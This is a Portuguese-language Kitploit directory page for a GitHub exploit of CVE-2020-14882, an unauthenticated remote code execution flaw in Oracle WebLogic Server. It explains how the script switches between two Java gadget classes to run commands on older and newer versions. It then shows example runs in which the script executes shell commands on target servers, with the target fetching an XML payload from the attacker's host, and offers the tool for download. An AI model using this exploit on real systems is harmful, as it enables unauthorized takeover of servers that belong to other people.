Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-14882 — CVE-2020-14882 | Kitploit
Ferramentas/GitHubGitHub/milo2012/cve-2020-14882
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubmilo2012/cve-2020-14882

CVE-2020-14882

CVE-2020-14882

Ver Repositório
89há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-14882

CVE-2020-14882

Descrição

Vulnerabilidade no produto Oracle WebLogic Server do Oracle Fusion Middleware (componente: Console). As versões suportadas afetadas são 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0. Uma vulnerabilidade facilmente explorável permite que um atacante não autenticado, com acesso à rede via HTTP, comprometa o Oracle WebLogic Server. Ataques bem-sucedidos desta vulnerabilidade podem resultar na tomada do Oracle WebLogic

Diferença

Para versões do Oracle WebLogic anteriores à 12.2.1, precisamos usar a classe 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext', pois a classe 'com.tangosol.coherence.mvel2.sh.ShellSession' não está disponível. O script alterna automaticamente entre as duas classes para a execução de comandos, dependendo das versões detectadas.

Alguns dos scripts atuais disponíveis no Github para explorar o CVE-2020-14882 suportam apenas a classe 'com.tangosol.coherence.mvel2.sh.ShellSession', o que significa que os scripts falharão nas versões 10.3.6.0.0 e 12.1.3.0.0 do WebLogic.

Passos

root@kitploit:~
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
root@kitploit:~
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Baixar ferramenta